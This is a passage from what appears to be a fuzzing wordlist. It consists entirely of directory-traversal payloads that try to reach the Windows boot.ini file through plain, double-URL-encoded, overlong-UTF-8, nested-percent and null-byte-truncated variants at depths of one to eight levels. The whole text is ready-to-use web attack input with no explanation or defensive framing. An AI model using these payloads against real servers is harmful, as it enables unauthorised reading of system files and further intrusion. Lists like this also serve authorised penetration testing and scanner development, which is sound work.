-%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -..%252fboot.ini -..%252f..%252fboot.ini -..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -%252e%252e/boot.ini -%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -..\boot.ini -..\..\boot.ini -..\..\..\boot.ini -..\..\..\..\boot.ini -..\..\..\..\..\boot.ini -..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\boot.ini -..%255cboot.ini -..%255c..%255cboot.ini -..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -%252e%252e\boot.ini -%252e%252e\%252e%252e\boot.ini..%5cboot.ini -..%5c..%5cboot.ini -..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -%2e%2e\boot.ini -%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -..%c0%afboot.ini -..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -..%25c0%25afboot.ini -..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -..%c1%9cboot.ini -..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -..%25c1%259cboot.ini -..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -..%%32%66boot.ini -..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -..%%35%63boot.ini -..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -../boot.ini%00index.html -../../boot.ini%00index.html -../../../boot.ini%00index.html -../../../../boot.ini%00index.html -../../../../../boot.ini%00index.html -../../../../../../boot.ini%00index.html -../../../../../../../boot.ini%00index.html -../../../../../../../../boot.ini%00index.html -..%2fboot.ini%00index.html -..%2f..%2fboot.ini%00index.html -..%2f..%2f..%2fboot.ini%00index.html -..%2f..%2f..%2f..%2fboot.ini%00index.html -..%2f..%2f..%2f..%2f..%2fboot.ini%00index.html -..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00index.html -..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00index.html -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00index.html -%2e%2e/boot.ini%00index.html -%2e%2e/%2e%2e/boot.ini%00index.html -%2e%2e/%2e%2e/%2e%2e/boot.ini%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00index.html -%2e%2e%2fboot.ini%00index.html -%2e%2e%2f%2e%2e%2fboot.ini%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini%00index.html -..%252fboot.ini%00index.html -..%252f..%252fboot.ini%00index.html -..%252f..%252f..%252fboot.ini%00index.html -..%252f..%252f..%252f..%252fboot.ini%00index.html -..%252f..%252f..%252f..%252f..%252fboot.ini%00index.html -..%252f..%252f..%252f..%252f..%252f..%252fboot.ini%00index.html -..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini%00index.html -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini%00index.html -%252e%252e/boot.ini%00index.html -%252e%252e/%252e%252e/boot.ini%00index.html -%252e%252e/%252e%252e/%252e%252e/boot.ini%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini%00index.html -%252e%252e%252fboot.ini%00index.html -%252e%252e%252f%252e%252e%252fboot.ini%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini%00index.html -..\boot.ini%00index.html -..\..\boot.ini%00index.html -..\..\..\boot.ini%00index.html -..\..\..\..\boot.ini%00index.html -..\..\..\..\..\boot.ini%00index.html -..\..\..\..\..\..\boot.ini%00index.html -..\..\..\..\..\..\..\boot.ini%00index.html -..\..\..\..\..\..\..\..\boot.ini%00index.html -..%5cboot.ini%00index.html -..%5c..%5cboot.ini%00index.html -..%5c..%5c..%5cboot.ini%00index.html -..%5c..%5c..%5c..%5cboot.ini%00index.html -..%5c..%5c..%5c..%5c..%5cboot.ini%00index.html -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00index.html -%2e%2e\boot.ini%00index.html -%2e%2e\%2e%2e\boot.ini%00index.html -%2e%2e\%2e%2e\%2e%2e\boot.ini%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini%00index.html 